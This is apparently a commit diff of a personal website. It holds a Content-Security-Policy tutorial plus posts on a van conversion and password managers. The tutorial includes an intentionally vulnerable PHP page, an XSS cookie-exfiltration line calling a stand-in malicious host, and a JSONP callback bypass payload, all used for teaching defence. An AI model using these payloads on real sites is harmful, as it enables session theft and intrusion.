Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com
|
||||
```
|
||||
|
||||
In this example, we've added directives for styles, images, and fonts, allowing
|
||||
them to be loaded from specific approved sources.
|
||||
|
||||
It's important to note that implementing CSP is an iterative process. You'll
|
||||
likely need to adjust your policy as you add new features and functionality to
|
||||
your website. A good approach is to start with a strict policy and gradually
|
||||
loosen it as needed, while keeping security as the top priority.
|
||||
|
||||
Whilst testing, it may be useful to use the
|
||||
[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only)
|
||||
header. Whilst it doesn't provide any protection, it also won't break an
|
||||
existing site as it only reports report violations, rather than blocking them.
|
||||
|
||||
## Why Bother
|
||||
|
||||
So, we have an idea of how to set a CSP, but not why we may want to. The main
|
||||
reason to have a strong CSP set is to protect against injection attacks. The
|
||||
most common of these is cross-site-scripting, where JavaScript is injected;
|
||||
although other types do exist when injecting malicious css (style-injection), or
|
||||
images (image-injection). The example below explains one way in which script
|
||||
injection, or cross-site-scripting, is bad.
|
||||
|
||||
Take the following simple PHP search page:
|
||||
|
||||
```php
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Vulnerable Search Page</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Search Our Website</h1>
|
||||
<form method="GET" action="/search.php">
|
||||
Search: <input type="text" name="search">
|
||||
<input type="submit" name="submit" value="Search">
|
||||
</form>
|
||||
|
||||
<?php
|
||||
if(isset($_GET['search'])) {
|
||||
echo "<h2>You searched for: " . $_GET['search'] . "</h2>";
|
||||
}
|
||||
|
||||
//Some logic to display search results
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
The important factor here is that the users search query (`$_GET['search']`) is
|
||||
output verbatim, without encoding or sanitising it.
|
||||
|
||||
If I perform a search for `<script>alert(1);</script>`, the following h2 tag will be sent to the browser:
|
||||
|
||||
```
|
||||
<h2>You searched for: <script>alert(1);</script></h2>
|
||||
```
|
||||
|
||||
The browser will see that, and interpret the script tag as a script it should
|
||||
execute. `alert(1)` is a relatively benign function that we often use to
|
||||
demonstrate the issue exists, without causing significant issues to the site.
|
||||
However, now imagine changing `alert(1)` for
|
||||
`fetch('https://malicious-site.com?c=' + document.cookie)`.
|
||||
|
||||
Now my cookies have been sent to a malicious site for the owner to do with as
|
||||
they please.
|
||||
|
||||
The content-security-policy can be use to add a layer of protection here. When
|
||||
set strictly, the browser can "know" that the script tag in the h1 tag isn't on
|
||||
a pre-approved list, so the browser won't execute it.
|
||||
|
||||
## Potential Mistakes
|
||||
|
||||
So, now we know why you might want a CSP, and how to set one, we'll look at some
|
||||
of the most common mistakes I see people make.
|
||||
|
||||
### `'unsafe-inline'` source
|
||||
|
||||
This source is very frequently added to a CSP, without realising it severely
|
||||
limits the protection that it can offer. Most online generators will add it as,
|
||||
in their current setup, most sites use inline resources. An inline resource is,
|
||||
as the name suggests, most script or style resources that are not external.
|
||||
|
||||
So,
|
||||
|
||||
```html
|
||||
<script>console.log("Inline");</script>
|
||||
<img src="something.jpg" onclick="console.log('Also Inline')" />
|
||||
<script src="/not-inline.js"></script>
|
||||
|
||||
<style>
|
||||
body{
|
||||
background-color: red; /*inline*/
|
||||
}
|
||||
</style>
|
||||
<img style="background-color: red; /*also inline*/" />
|
||||
<link rel="stylesheet" href="/not-inline.css" />
|
||||
```
|
||||
|
||||
The problem here is that, more often than not, inline JS is the easiest way to
|
||||
achieve XSS. The search example we used earlier added an inline script tag, so
|
||||
a CSP with unsafe-inline would not have prevented it from executing.
|
||||
|
||||
There are a number of better options here. First is externalising scripts. So,
|
||||
moving inline JS into an external file and adding it to the allow-list.
|
||||
|
||||
If that isn't possible, or practical, another option is to use the special
|
||||
`<hashtype>-<hash>` sources, or `nonce-<nonce>` sources. These allow you to add
|
||||
specific inline scripts to the allow-list, without allowing all inline scripts.
|
||||
Just make sure not to fall into the [potential mistakes with nonce
|
||||
sources](#nonce-source).
|
||||
|
||||
### `'unsafe-eval'` source
|
||||
|
||||
The unsafe-eval source is only relevant for JavaScript, and allows scripts to
|
||||
run `eval()`, and a couple of other similar functions. The most common use for
|
||||
eval I've seen is when targeting older JS environments that not have native
|
||||
JSON support as an alternative to `JSON.parse()`.
|
||||
|
||||
So, consider the following:
|
||||
|
||||
```js
|
||||
const jsonString = document.getElementById('someTextArea').value;
|
||||
const jsonObject = eval(jsonString2 );
|
||||
```
|
||||
|
||||
If the contents of the text area were:
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "Jane Doe",
|
||||
"age": 25
|
||||
}
|
||||
```
|
||||
|
||||
then:
|
||||
|
||||
```
|
||||
console.log(jsonObject.name); // Output: "Jane Doe"
|
||||
```
|
||||
|
||||
However, if the contents of the text area were `alert(1)`, then we are in the
|
||||
situation again whereby unsafe JavaScript is being executed. Unfortunately,
|
||||
there are a lot of different uses of eval, so a "fix" for all of them is
|
||||
unlikely. However, most modern frameworks do not need to use eval, so disabling
|
||||
it is preferable if possible.
|
||||
|
||||
### Nonce source
|
||||
|
||||
The nonce source allows site maintainers to allow some inline sources to be
|
||||
included. We've been using JavaScript as examples, so I will continue to do so,
|
||||
but note that this is also relevant for CSS.
|
||||
|
||||
```
|
||||
Content-Security-Policy: script-src 'nonce-uph5Fai4'
|
||||
```
|
||||
|
||||
```
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Example</title>
|
||||
<script nonce="uph5Fai4">
|
||||
console.log("This will run");
|
||||
</script>
|
||||
<script>
|
||||
console.log("This won't");
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Our Website</h1>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
For the nonce source to be effective, it must be unpractical for malicious actor
|
||||
to guess the nonce. In practice, this generally means using a long and random
|
||||
string of characters for each response. The nonce should not be re-used. If a
|
||||
malicious actor can guess what a nonce is, then they can simply add the
|
||||
attribute to their injected payload.
|
||||
|
||||
### JSONP Sources
|
||||
|
||||
JSONP (JSON with Padding) is a technique used to bypass the same-origin policy,
|
||||
which is a security feature implemented by web browsers to prevent a web page
|
||||
from making requests to a different domain than the one that served the web
|
||||
page.
|
||||
|
||||
The way JSONP works is as follows:
|
||||
|
||||
1. The client-side code defines a function, to processes JSON data.
|
||||
1. A `<script>` tag is created with its `src` attribute to a URL that returns a JSON response, with the name of the previously defined function specified.
|
||||
2. The server-side code wraps the JSON response in a function call, with the function name provided.
|
||||
|
||||
Here's an example:
|
||||
|
||||
Client-side HTML:
|
||||
|
||||
```html
|
||||
<script>
|
||||
function handleResponse(data) {
|
||||
console.log(data);
|
||||
}
|
||||
</script>
|
||||
<script src="https://example.com/data?callback=handleResponse"></script>
|
||||
```
|
||||
|
||||
The response to that data script would look something like:
|
||||
|
||||
```javascript
|
||||
handleResponse({
|
||||
"name": "John Doe",
|
||||
"age": 30
|
||||
});
|
||||
```
|
||||
|
||||
JSONP was a popular technique in the past, as it allowed developers to make
|
||||
cross-domain requests without running into the same-origin policy.
|
||||
|
||||
However, if a user is able to inject a script tag into a document, and a CDN
|
||||
that is known to host JSONP endpoints is on the allow-list, they could include
|
||||
something like
|
||||
|
||||
```html
|
||||
<script src="https://example.com/data?callback=alert(1);handleResponse"></script>
|
||||
```
|
||||
|
||||
Most implementations will then return the following:
|
||||
|
||||
```javascript
|
||||
alert(1);handleResponse({
|
||||
"name": "John Doe",
|
||||
"age": 30
|
||||
});
|
||||
```
|
||||
|
||||
JSONP is now generally discouraged, in favour of
|
||||
[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to
|
||||
explicitly allow some resources to be requested across origins. However, note
|
||||
that many CDNs host JSONP endpoints, so even if your site doesn't use them,
|
||||
allowing a domain that hosts them is enough to provide a CSP bypass in many
|
||||
situations. The CSP does allow sub directories or even specific files to be
|
||||
added to the allow-list, so if unsure about whether a CDN provides JSONP
|
||||
endpoints, you may wish to explicitly allow a specific file on the CDN, rather
|
||||
than all files.
|
||||
|
||||
For example:
|
||||
|
||||
```
|
||||
Content-Security-Policy: script-src http://example.com/file.js;
|
||||
```
|
||||
|
||||
as opposed to
|
||||
|
||||
```
|
||||
Content-Security-Policy: script-src http://example.com/;
|
||||
```
|
||||
|
||||
### Domains Which Allow Uploads
|
||||
|
||||
When you include a domain in your CSP, you're essentially giving control of your
|
||||
website's security to that platform and all the developers who publish code on
|
||||
it. Not only does this potentially introduce [supply chain
|
||||
attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html),
|
||||
many CDNs also allow public submission. Unpkg, for instance, is a popular CDN
|
||||
that hosts everything on NPM. All you need to submit code to it is a free NPM
|
||||
account. If a CSP includes unpkg, or one of the many similar services, in their
|
||||
CSP; anyone can submit code that the CSP will allow to run.
|
||||
|
||||
#### Self source
|
||||
|
||||
It is worth noting that the `'self'` keyword can introduce a similar issue.
|
||||
|
||||
The `'self'` source is a shortcut to allow sources from
|
||||
the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin).
|
||||
|
||||
The difference between origin and site has been discussed [elsewhere in more
|
||||
detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an
|
||||
origin is defined by scheme (protocol), hostname (domain), and port of the url.
|
||||
Sub domains are a different origin, although often the same same site.
|
||||
|
||||
```
|
||||
https://example.jonathanh.co.uk:443/something/cool
|
||||
│ │
|
||||
└────────────Origin───────────────┘
|
||||
|
||||
https://example.jonathanh.co.uk:443/something/cool
|
||||
│ │
|
||||
└────Site─────┘
|
||||
```
|
||||
|
||||
Normally, including `'self'` is safe, although care should be taken if you allow
|
||||
users of your site to upload content, and that content is accessible on the same
|
||||
origin. If so, a user could potentially upload a malicious file and bypass the
|
||||
CSP as the file is available under the `'self'` domain.
|
||||
|
||||
|
||||
### Other Permissive Sources
|
||||
|
||||
The following are considered permissive. I won't go into too much detail for
|
||||
each, but ideally you should avoid using:
|
||||
|
||||
* `https:` - Any source that is hosted on an encrypted server. A malicious actor
|
||||
can very easily spin up a server with a valid certificate
|
||||
* `data:` - Any source that can be loaded via a data scheme. In most cases, this
|
||||
just involves base64 encoding a payload.
|
||||
|
||||
|
158
content/blog/022-new-van.md
Normal file
158
content/blog/022-new-van.md
Normal file
|
@ -0,0 +1,158 @@
|
|||
---
|
||||
title: I Got a Van
|
||||
date: 2024-08-24
|
||||
tags:
|
||||
- Van Build
|
||||
description: >
|
||||
I've bought a van. I'm planning on converting it to a camper and documenting
|
||||
the process here.
|
||||
---
|
||||
|
||||
So, as you've probably gathered from the title, I've bought a van. Or, at least,
|
||||
reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato
|
||||
L4H2 which means it's long and quite tall.
|
||||
|
||||
There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One
|
||||
of the biggest requirements we have is that the van is both comfortable and safe
|
||||
for him to live and travel in. We have some ideas and thoughts around this, but
|
||||
you will hopefully see what that looks like in future posts.
|
||||
|
||||
My plan is to convert this van into a camper. This first post is mainly a brain
|
||||
dump, for me as much as anyone else, about my current plans. Many will change,
|
||||
some may be scrapped all together.
|
||||
|
||||
We are not planning on living in the van. However, it would be nice if we can go
|
||||
away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously,
|
||||
we will use it for shorter weekend breaks, but we don't want to be limited
|
||||
to a week or so at a time. As a result, we should be able to work from the van.
|
||||
|
||||
We are in a very fortunate position that my wife and I both work from home for
|
||||
the vast majority of the time. As a result, as long as we have a reasonable
|
||||
internet connection and electricity, we can both work.
|
||||
|
||||
Obviously, if we are both working off laptops, and potentially with additional
|
||||
monitors, or power consumption is likely to be on the higher end. The electrical
|
||||
system in the van will definitely be a separate blog post, but at the moment, it
|
||||
looks like we'll be going for [LiFePO_4_
|
||||
batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery).
|
||||
Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so
|
||||
we can charge the batteries whilst driving. We will probably also add a shore
|
||||
power hookup, but that may come further down the line.
|
||||
|
||||
For the internet side of things, I plan to mount a 5G antenna on the roof.
|
||||
Despite the name, it should pick up all the Gs. I will be on the look out for a
|
||||
router that I can plug such an antenna into, preferably one that supports the
|
||||
something like OpenWRT.
|
||||
|
||||
This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It
|
||||
will be available in the van for all my ESP boards (more on that later), but if
|
||||
I'm working on my laptop, I want it plugged in with a cable. So, I will be
|
||||
running Ethernet in my van, as well as power and water and whatever else I need
|
||||
to make it into a camper. I won't be going overboard like I did in my house -
|
||||
weight is a consideration in a van and cables are heavy; but I will be running
|
||||
it to (as a minimum) the office space for me and my wife, and my van server.
|
||||
|
||||
Van server? Yes, you heard (read?) that right. I'll be having a server in my
|
||||
van. I am not sure yet if I'll be going down the Pi route, or something like a
|
||||
Nuc, but I will be having a low-ish powered server in the van. This will run
|
||||
things like [Home Assistant](https://www.home-assistant.io/) (more on that in a
|
||||
bit), [PiHole](https://pi-hole.net/),
|
||||
[AudioBookShelf](https://www.audiobookshelf.org/),
|
||||
[WireGuard](https://www.wireguard.com/) and maybe a few other things.
|
||||
Importantly, I won't be using it to run things that need a lot of power - think
|
||||
Jellyfin, Ollama and such.
|
||||
|
||||
Things might change. Obviously, with a server that can go on motorways, spinning
|
||||
hard drives are a no-go. So storage is likely to have to be solid state for
|
||||
everything. As a result, I won't really be using this for a NAS. Storage of
|
||||
photos and videos will still go to my home server in my house. But things like
|
||||
audiobooks and podcasts that I am likely to want to listen to on the go will be
|
||||
stored on the local network.
|
||||
|
||||
So, I mentioned Home Assistant. I am a big fan of **some** smart home tech. For
|
||||
me to be a fan of it, it needs to run (or be made to run) locally. Being able to
|
||||
turn your lights on from your phone is great, but if the switch on the wall
|
||||
doesn't work without an internet connection, I'm not interested. In my house,
|
||||
all of our light switches have been flashed with [ESPHome](https://esphome.io/).
|
||||
This custom firmware allows the switch to be controlled via Home Assistant, but
|
||||
importantly, even if my network has some catastrophic failure, the button still
|
||||
works. In the van, the chances of no internet are likely to be high - even with
|
||||
a fancy antenna on the roof. So, requiring the internet is an absolute no go for
|
||||
me.
|
||||
|
||||
That will probably mean a whole bunch of DIY devices. I should be able to quite
|
||||
easily make things like lighting smart. I would also like to think that things
|
||||
like water sensors for my fresh and waste water can be read by an ESP device.
|
||||
What will probably take a bit more work / experimentation will be plugging an
|
||||
ESP device into the vehicles CAN bus to see if I can read data from that. It
|
||||
would also be great to have things like celling fans and heaters controllable
|
||||
from Home Assistant.
|
||||
|
||||
Talking of fans and heaters, it is probably worth me mentioning that I will be
|
||||
trying to keep costs down where possible - or at least prioritising where money
|
||||
is spent. I would much rather, for instance, buy a cheap [Chinese celing
|
||||
fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel
|
||||
heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy
|
||||
decent electronics from the likes of [Victron](https://www.victronenergy.com/).
|
||||
|
||||
Of course, I'll be taking things like the fans apart to see if I can stick an
|
||||
ESP chip in them and control them with Home Assistant.
|
||||
|
||||
With regard to cooking in the van, I'm currently undecided on the best course of
|
||||
action. I would like to go fully electric, with induction hobs and an electric
|
||||
oven. Obviously, this would mean I need even more batteries in the van, which
|
||||
will increase the weight even more. However, I think with the amount of driving
|
||||
we normally do, I should be able to keep batteries topped up from the vehicle's
|
||||
alternator. It is possible that we will keep a gas camping stove somewhere so
|
||||
that if we're caught out, we can still boil water and heat food. But I would
|
||||
rather avoid the added hassle of gas canisters and piping if I can.
|
||||
|
||||
With regard to water, I would like to mount both fresh and waste water tanks
|
||||
under the van. I don't yet know how big they will be, and will probably be
|
||||
determined by weight restrictions. However, my plan is to fit a low powered
|
||||
immersion heater into these to prevent them freezing in the winter. I won't be
|
||||
using this to make hot water, just to keep the temperature of the water above
|
||||
freezing - again probably powered by an ESP chip.
|
||||
|
||||
Hot water is a different story. I have seen many youtube van builders pipe their
|
||||
diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I
|
||||
would also like to try and heat the water from the engine's coolant system. I
|
||||
haven't seen this done in a camper (I'm not suggesting it hasn't been done), but
|
||||
I have seen it done [on other
|
||||
vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o).
|
||||
|
||||
One thing I'm fairly sure I don't want in the van is a full sized shower. At
|
||||
least, not an internal one. Space is a premium in a van, and in my opinion, the
|
||||
space a shower takes up is unnecessary. I will probably add something like the
|
||||
[Bullfinch External Shower
|
||||
Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/),
|
||||
so we can have outdoor showers if we need them. But most of the time, I think
|
||||
we'll be able to make do with a flannel and a bowl of hot water. It does mean
|
||||
that the sink in the van will need to be big enough to wash our hair in. An
|
||||
added bonus of the external shower system is we'll be able to wash off Rumple
|
||||
before he gets in the van when he inevitably gets covered in mud.
|
||||
|
||||
Only thing I haven't really touched upon is the planned layout. That will
|
||||
probably be my next blog post, but I plan to keep it quite simple. Bed at the
|
||||
back. Undecided yet on the orientation, and that will depend if I can sleep
|
||||
width ways once we've added the insulation. If I can't, and we end up making the
|
||||
bed go length ways, we will probably have an "almost" fixed bed, where the
|
||||
bottom foot or so is removable and is used as a back rest or something. This
|
||||
frees up some more space in the middle of the van during the day, but still
|
||||
means we don't need to make our bed each evening.
|
||||
|
||||
The cab area will have swivel seats. This will make our main living / working
|
||||
area, and as a result, we won't have a separate "lounge". Again, space is at a
|
||||
premium in a van.
|
||||
|
||||
Between the cab / living area and the bed will be our kitchen and toilet areas,
|
||||
as well as a spot for Rumple's bed. Importantly this will include a mounting
|
||||
point for his harness so he is secured whilst driving.
|
||||
|
||||
Before I finish up, it's probably important that I clarify a few things. I will
|
||||
be learning as I go. I will be making mistakes and I will aim to share those
|
||||
with you. However, this "build log" will not be tutorials. I am not an
|
||||
electrician, so don't take electrical advice off me. Same for plumbing or
|
||||
carpentry or anything else for that matter. That being said, if you spot
|
||||
something I could be doing better, or an idea you think I might like, or just
|
||||
want to say hi, leave a comment by emailing `comments.new-van<at>jn.hn`.
|
56
content/blog/023-wallace-and-gromit-passwords.md
Normal file
56
content/blog/023-wallace-and-gromit-passwords.md
Normal file
|
@ -0,0 +1,56 @@
|
|||
---
|
||||
title: Passwords Most Fowl
|
||||
date: 2024-12-26
|
||||
tags:
|
||||
- Security
|
||||
description: >
|
||||
If you're like me, some of yesterday (Christmas 2024) was spent watching the
|
||||
new Wallace and Gromit. I wonder if like me it also got you thinking about
|
||||
password managers.
|
||||
---
|
||||
|
||||
**Warning:** Contains Spoilers!
|
||||
|
||||
If you caught the latest episode, "Vengeance Most Fowl," you know, they were
|
||||
once again up against the sneaky Feathers McGraw, who pulls off a pretty clever
|
||||
hack involving a "smart gnome." The twist? The gnome’s password was super easy
|
||||
to guess! While it's all in good fun, it’s a great reminder of why we should all
|
||||
be using password managers.
|
||||
|
||||
In the episode, Feathers McGraw’s ability to crack the gnome's password
|
||||
highlights a real issue we face today: weak passwords. Let's be honest, are you
|
||||
still using simple passwords like birthdays or pets' names? Or maybe your pets
|
||||
name with a 1 and an exclamation mark? It’s way too easy for hackers to figure
|
||||
those out, and that puts our personal info at risk.
|
||||
|
||||
Now, imagine if Wallace had a password manager. If he'd used it properly,
|
||||
he would've had strong, unique passwords for all his inventions and accounts.
|
||||
He could have even shared the passwords with his trusty companion.
|
||||
|
||||
That would've made it nearly impossible for Feathers McGraw - or anyone else for
|
||||
that matter - to break into the gnomes. Or at least, not by guessing the
|
||||
passwords.
|
||||
|
||||
I'd also like to draw attention to everything getting "smart" in our
|
||||
increasingly connected world, it seems like everything is getting a smart
|
||||
upgrade - from our fridges to our light bulbs, and even garden gnomes!
|
||||
|
||||
While the convenience of smart devices can be appealing, there are some serious
|
||||
risks that come with connecting everything to the internet. In "Vengeance Most
|
||||
Fowl," the hacked smart gnome serves as a perfect example of how these devices
|
||||
can become vulnerabilities. When we connect everyday items to the internet, we
|
||||
open the door for hackers to exploit them, potentially gaining access to our
|
||||
personal information or even taking control of our homes.
|
||||
|
||||
Whilst the gnomes in Wallace and Gromit were obviously over the top and comical,
|
||||
it's become the norm for everything from cameras to lawn mowers to be connected.
|
||||
|
||||
Imagine a world where your smart gnome could be used to spy on you or trigger a
|
||||
series of unfortunate events, just like in the episode. The more devices we
|
||||
connect, the more points of entry there are for cybercriminals. Many of these
|
||||
smart devices come with default passwords or lack robust security features,
|
||||
making them easy targets. It's crucial to remember that while technology can
|
||||
make our lives easier, it also requires us to be vigilant about our security
|
||||
practices. By being mindful of what we connect to the internet and ensuring that
|
||||
we use strong passwords and security measures, we can enjoy the benefits of
|
||||
smart technology without falling victim to the dangers it can bring.
|
|
@ -44,6 +44,8 @@ ${LRED}Jonathan Hodgson${NC}
|
|||
|
||||
${RED}CONTACT${NC}
|
||||
${ORANGE}Email: ${GREEN}jonathan@jonathanh.co.uk${NC}
|
||||
${ORANGE}Matrix: ${GREEN}@jonathan:jn.hn${NC}
|
||||
${ORANGE}Mastodon: ${GREEN}@archie2870@mastodon.technology${NC}
|
||||
${ORANGE}Dotfiles: ${GREEN}https://jn.hn/dots/${NC}
|
||||
${ORANGE}Blog: ${GREEN}https://jn.hn${NC}
|
||||
|
||||
|
|
|
@ -10,11 +10,18 @@ I hate websites tracking me so I won't be tracking you if you visit my website.
|
|||
* Bitcoin Wallet: 132AM5imvDiWXJQGfMiGBmvnfaChaUTaQ6
|
||||
* PayPal Me: <https://paypal.me/jab2870>
|
||||
|
||||
## Amazon Associates Links
|
||||
|
||||
In some blog posts, I include links to products that are part of the [Amazon
|
||||
Associates](https://affiliate-program.amazon.co.uk/) program. At no cost to you,
|
||||
I receive a small commission based on any sales that are made using the link. I
|
||||
would appreciate it if you could use these links when making purchases, although
|
||||
understand fully if you choose not to. I will aim to include a non-associates
|
||||
link along side the associates one.
|
||||
|
||||
## Indirectly
|
||||
|
||||
If you can't afford (or don't want) to support me, that's fine. The content I put out will always be freely available and without any form of tracking. There are some affiliate links you can use that I will get a kick back from. Be warned though, some of these services might track you - unfortunately that is out of my control. If you don't want them to, don't click the links.
|
||||
|
||||
* Lbry: <https://lbry.tv/$/invite/@jonathanh:7> - Lbry is a decentralised video sharing platform. By signing up with this link, they give me some of the crypto currency the platform is built around.
|
||||
* Digital Ocean: <https://m.do.co/c/e6f44c36362f> - Digital ocean is a hosting platform. By using this link, you will get $100 to spend (it expires after 60 days). I will also get $25 if you use it.
|
||||
* Smarty: <http://referme.to/KZ6bPZx> - (UK Only) If you sign up for Smarty sim card, we both get a free month.
|
||||
* Curve: <http://www.curve.app/join#DWGGW26E> - All your cards in one. If you sign up, we each get £5
|
||||
|
|
4
content/microblog/1645562722
Normal file
4
content/microblog/1645562722
Normal file
|
@ -0,0 +1,4 @@
|
|||
---
|
||||
title: Tue 22 Feb 2022 20:45:22 GMT
|
||||
---
|
||||
I'm bad at blogging, let's see if I'm any better at micro-blogging
|
4
content/microblog/1645886681
Normal file
4
content/microblog/1645886681
Normal file
|
@ -0,0 +1,4 @@
|
|||
---
|
||||
title: Sat 26 Feb 2022 14:44:41 GMT
|
||||
---
|
||||
Back from a super wedding of close friends. Hopefully I'll be able to keep up an almost-daily micro blog
|
4
content/microblog/1646152089
Normal file
4
content/microblog/1646152089
Normal file
|
@ -0,0 +1,4 @@
|
|||
---
|
||||
title: Tue 1 Mar 2022 16:28:09 GMT
|
||||
---
|
||||
Why can I not make my QT apps look right? *sigh*
|
4
content/microblog/1646185440
Normal file
4
content/microblog/1646185440
Normal file
|
@ -0,0 +1,4 @@
|
|||
---
|
||||
title: Wed 2 Mar 2022 01:44:00 GMT
|
||||
---
|
||||
What a terrible journey. :( Home now, time for bed
|
|
@ -9,13 +9,21 @@ I consume a lot more content than I produce. If you are interested in similar st
|
|||
|
||||
### HexDSL
|
||||
|
||||
Does a lot of videos on Linux gaming (not of much interest to me) but also does
|
||||
great videos on non-gaming linux content. *Side note:* He seems like a great guy
|
||||
on his discord server.
|
||||
Used to do a lot of videos on Linux. Those old videos still great. Now probably
|
||||
falls more under general interest.
|
||||
|
||||
*Side note:* He is a great guy. Got to meet him in real life and talk quite a
|
||||
bit on Discord.
|
||||
|
||||
* [Website](https://hexdsl.co.uk/)
|
||||
* [Youtube](https://www.youtube.com/channel/UCRE3NFNtdjR96-H4QG4U1Fg)
|
||||
|
||||
### Josuhua Crew
|
||||
|
||||
Lots of linux-y things
|
||||
|
||||
* [Website](https://www.joshuacrewe.co.uk/)
|
||||
|
||||
### Brodie Robertson
|
||||
|
||||
Videos about Linux and surrounding areas
|
||||
|
@ -29,12 +37,34 @@ Mostly videos on Vim and some tools he uses with Vim.
|
|||
* [Youtube](https://www.youtube.com/channel/UCXPHFM88IlFn68OmLwtPmZA)
|
||||
|
||||
|
||||
## Home Assistant / Smart Home
|
||||
|
||||
### 3Ative
|
||||
|
||||
Put ESPs in all the things. Very useful if you want to get into electronics.
|
||||
|
||||
*Side note*: Seems like a great guy in Discord!
|
||||
|
||||
* [Youtube](https://www.youtube.com/user/3ative)
|
||||
|
||||
### Speak to the Geek
|
||||
|
||||
Product reviews - focus on heating systems and energy, but covers other stuff.
|
||||
|
||||
* [Youtube](https://www.youtube.com/@SpeakToTheGeekTech)
|
||||
|
||||
### Self Hosted
|
||||
|
||||
Podcast about self hosting. Talks a lot about home automation.
|
||||
|
||||
* [Podcast](https://selfhosted.show/)
|
||||
|
||||
### Everything Smart Home
|
||||
|
||||
Mostly product reviews and home assistant tutorials
|
||||
|
||||
* [Youtube](https://www.youtube.com/@EverythingSmartHome)
|
||||
|
||||
## Security
|
||||
|
||||
### Darknet Diaries
|
||||
|
|
64
content/wishlist.md
Normal file
64
content/wishlist.md
Normal file
|
@ -0,0 +1,64 @@
|
|||
---
|
||||
title: Wishlist
|
||||
---
|
||||
|
||||
This is a list of things I'd like. I'll probably get around to getting some of
|
||||
them at some point. If you are looking to get me something, this might be a good
|
||||
place to look
|
||||
|
||||
## Van
|
||||
|
||||
|
||||
|
||||
## Smart Home
|
||||
|
||||
### Door / window sensors (~£10 each)
|
||||
|
||||
Eventually I'll want one on every window and door so duplicating these isn't a
|
||||
problem. I am not fussy about the brand. As long as it's zigbee
|
||||
|
||||
<https://www.amazon.co.uk/Wireless-Smartphone-Security-Compatible-Batteries/dp/B08XB4WGSD/ref=sr_1_11?crid=3SJSCQKYEK2YE&keywords=zigbee+sonoff&qid=1658419177&sprefix=zigbee+sonoff%2Caps%2C92&sr=8-11>
|
||||
|
||||
|
||||
## 3d printing
|
||||
|
||||
### Filament
|
||||
|
||||
Basically any reputable brand. Esun, elagoo, sovol. I mostly use PLA. Sometimes
|
||||
it's sold as PLA+. Occasionally use PETG or TPU.
|
||||
|
||||
Use black and navy blue most.
|
||||
|
||||
<https://www.amazon.co.uk/eSUN-Filament-Dimensional-Accuracy-Printing/dp/B0834JNT5H/>
|
||||
|
||||
## Coffee
|
||||
|
||||
<https://www.youtube.com/watch?v=fsNpZzpgayY>
|
||||
|
||||
<https://www.youtube.com/watch?v=yqgVGTuDMDc>
|
||||
|
||||
|
||||
### Arco Grinder (~£350)
|
||||
|
||||
<https://goat-story.com/products/arco-coffee-grinder?variant=39636911292451>
|
||||
|
||||
## Covert Companion (~$90)
|
||||
|
||||
<https://covertinstruments.com/collections/ssf-bypass-bible/products/covert-companion-fully-loaded>
|
||||
|
||||
### Expansion Pack
|
||||
|
||||
<https://covertinstruments.com/collections/ssf-bypass-bible/products/covert-companion-turning-tool-expansion-pack>
|
||||
|
||||
## Memory Sticks
|
||||
|
||||
Below are examples. Get a reputable brand. I am yet to get "enough" memory
|
||||
sticks.
|
||||
|
||||
<https://www.amazon.co.uk/SanDisk-Ultra-USB-Flash-Drive/dp/B00DQG9OZ2/ref=sr_1_3?crid=3K0MUL9W2C5FX&keywords=memory+stick&qid=1642086449&refinements=p_89%3ASanDisk&rnid=1632651031&s=computers&sprefix=memory+stick%2Caps%2C81&sr=1-3>
|
||||
|
||||
<https://www.amazon.co.uk/Kingston-DT100G3-32GB-3P-DataTraveler-Drives/dp/B081PJQRYS/ref=sr_1_7?crid=3K0MUL9W2C5FX&keywords=memory+stick&qid=1642086475&refinements=p_89%3AKingston&rnid=1632651031&s=computers&sprefix=memory+stick%2Caps%2C81&sr=1-7>
|
||||
|
||||
## Other random stuff
|
||||
|
||||
Hacksmith mini saber: <https://hacksmith.store/en-gb/products/hacksmith-mini-saber?variant=39960182522026>
|
|
@ -6,5 +6,16 @@ services:
|
|||
- "8080:80"
|
||||
volumes:
|
||||
- ./nginx:/etc/nginx/conf.d:ro
|
||||
- ./public_html:/usr/share/nginx/html:ro
|
||||
- ./public:/usr/share/nginx/html:ro
|
||||
- ./assets:/usr/share/nginx/assets:ro
|
||||
|
||||
gemini:
|
||||
image: adrianhesketh/gemini
|
||||
volumes:
|
||||
- ./public:/content:ro
|
||||
- ./gem-cert:/certs:ro
|
||||
environment:
|
||||
- PORT=1965
|
||||
- DOMAIN=jonathanh.co.uk
|
||||
ports:
|
||||
- "1965:1965"
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
include mime.types
|
||||
include mime.types;
|
||||
|
||||
types {
|
||||
text/markdown md;
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue